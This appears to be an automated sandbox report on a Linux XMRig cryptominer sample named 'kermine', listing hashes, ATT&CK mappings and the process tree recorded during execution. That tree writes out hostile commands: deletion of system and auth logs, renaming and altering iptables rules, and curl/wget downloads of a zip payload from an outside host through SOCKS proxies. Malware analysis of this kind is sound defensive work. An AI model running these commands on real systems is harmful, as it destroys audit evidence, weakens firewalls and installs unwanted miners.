xmrig_linux | e0167b29311f359344fe2879d8de3e8f5eb4c4d5a54bf0d46406d1d7af0cd2ff

Resubmissions

21-10-2024 12:12

241021-pdcl5stbje 10

21-10-2024 11:59

19-10-2024 11:43

19-10-2024 03:15

19-10-2024 03:03

18-10-2024 09:09

Analysis

max time kernel
599s
max time network
517s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
19-10-2024 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kermine
Size

1.3MB
MD5

13d1ec32d39153bddcb677fc491d90f8
SHA1

28f07354c83098f3f2f988249251096bcdf68549
SHA256

7f2b4e30c6ae7c56c0bc861f920bca6b52183b3e8bc30347739c6591bdfaa589
SHA512

1dbcab16cb408f8c895609af43f973c09b4c0dda5da1f36e2524823b53874cdce585bf4d4d489f9323043f69d688cf3375ad14036e99f0b09c6bdfddf66289b4
SSDEEP

24576:87U+XfGMTwJ7RBNytH9wiPGKgIxECVVXZSELt:8g+XfjU7RBNC9wiPGKgIxE8VwE

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Deletes log files 1 TTPs 3 IoCs
Deletes log files on the system.
defense_evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rmrmrm

description ioc process

File deleted /var/log/messages* rm
File deleted /var/log/secure* rm
File deleted /var/log/auth.log rm

description	ioc	process
File deleted	/var/log/syslog	rm

description	ioc	process
File deleted	/var/log/messages*	rm
File deleted	/var/log/secure*	rm
File deleted	/var/log/auth.log	rm

Reads runtime system information 24 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

awkxargsawkmvmkdirxargsawkxargsawkxargsxargsawkmvawkawkawkstatmvxargsxargsawkxargsxargsmv

description	ioc	process
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	stat
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/filesystems	mv

System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

mvmvcurlrmcurlmvmvstatrmwget

pid process

1513 mv
1557 mv
1565 curl
2014 rm
2015 curl
1512 mv
1558 mv
2008 stat
2009 rm
2010 wget
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

wget

description ioc process

File opened for modification /tmp/pn.zip wget

pid	process
1513	mv
1557	mv
1565	curl
2014	rm
2015	curl
1512	mv
1558	mv
2008	stat
2009	rm
2010	wget

description	ioc	process
File opened for modification	/tmp/pn.zip	wget

/tmp/kermine
/tmp/kermine
1⤵
PID:1502

/bin/bash
/bin/bash /dev/fd/3
1⤵
PID:1502

/bin/rm
rm -rf /var/www/html/config.json
2⤵
PID:1504

/bin/rm
rm -rf /root/.xmrig.json
2⤵
PID:1505

/bin/rm
rm -rf /root/.config/xmrig.json
2⤵
PID:1506

/bin/rm
rm -rf "/var/log/messages*"
2⤵
- Deletes log files
PID:1507

/bin/rm
rm -rf "/var/log/secure*"
2⤵
- Deletes log files
PID:1508

/bin/rm
rm -rf /var/log/auth.log
2⤵
- Deletes log files
PID:1509

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:1510

/sbin/sysctl
sysctl -p
2⤵
PID:1511

/bin/sleep
sleep 1
2⤵
PID:1514

/bin/mv
mv /sbin/tokens /sbin/iptables
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1513

/bin/mv
mv /usr/sbin/tokens /usr/sbin/iptables
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1512

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1522

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1521

/bin/grep
grep 138.68
2⤵
PID:1520

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1519

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1528

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1527

/bin/grep
grep 67.207
2⤵
PID:1526

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1525

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1532

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1531

/bin/grep
grep 46.101
2⤵
PID:1530

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1529

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1536

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1535

/bin/grep
grep 157.245
2⤵
PID:1534

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1533

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1540

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1539

/bin/grep
grep 146.190
2⤵
PID:1538

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1537

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1544

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1543

/bin/grep
grep 144.126
2⤵
PID:1542

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1541

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1548

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1547

/bin/grep
grep 167.172
2⤵
PID:1546

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1545

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1552

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1551

/bin/grep
grep 172.104
2⤵
PID:1550

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1549

/usr/bin/xargs
xargs -rL1 iptables -D INPUT -j DROP -s
2⤵
- Reads runtime system information
PID:1556

/usr/bin/awk
awk "{print \$8}"
2⤵
- Reads runtime system information
PID:1555

/bin/grep
grep 172.105
2⤵
PID:1554

/sbin/iptables
iptables -L INPUT -v -n
2⤵
PID:1553

/bin/mv
mv /sbin/iptables /sbin/tokens
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1558

/bin/mv
mv /usr/sbin/iptables /usr/sbin/tokens
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1557

/bin/mkdir
mkdir /etc/ad12e85f
2⤵
- Reads runtime system information
PID:1559

/usr/bin/head
head -c 8
2⤵
PID:1563

/usr/bin/md5sum
md5sum
2⤵
PID:1562

/bin/cat
cat /usr/share/dbus-1/interfaces.conf
2⤵
PID:1564

/usr/bin/curl
curl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :9090 http://example.established.site/pn.zip
2⤵
- System Network Configuration Discovery
PID:1565

/usr/bin/stat
stat "-c%s" /tmp/pn.zip
2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:2008

/bin/rm
rm -rf /tmp/pn.zip
2⤵
- System Network Configuration Discovery
PID:2009

/usr/bin/wget
wget "--timeout=5" "--tries=2" http://example.established.site/pn.zip -q -O /tmp/pn.zip
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:2010

/bin/rm
rm -rf /tmp/pn.zip
2⤵
- System Network Configuration Discovery
PID:2014

/usr/bin/curl
curl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :1081 http://example.established.site/pn.zip
2⤵
- System Network Configuration Discovery
PID:2015

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads